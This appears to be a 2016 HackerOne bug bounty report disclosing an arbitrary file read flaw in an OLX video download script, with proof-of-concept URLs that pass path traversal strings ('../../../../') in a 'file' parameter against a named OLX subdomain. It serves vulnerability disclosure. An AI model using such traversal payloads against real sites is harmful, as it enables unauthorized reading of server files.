OLX: Arbitrary File Reading

2016-07-12T00:29:37
ID H1:150783
Type hackerone
Reporter konqi
Modified 2016-08-12T15:30:33

Description

Hi!

The script for video downloading doesn't properly filter the input filename, and it's possible to read arbitrary files from File System

PoC

http://makeyourad1.olx.in/converted/final/ready/madeit/download.php?file=download.php http://makeyourad1.olx.in/converted/final/ready/madeit/download.php?file=../../../../b<< http://makeyourad1.olx.in/converted/final/ready/madeit/download.php?file=../../../../c<<

screenshots are attached below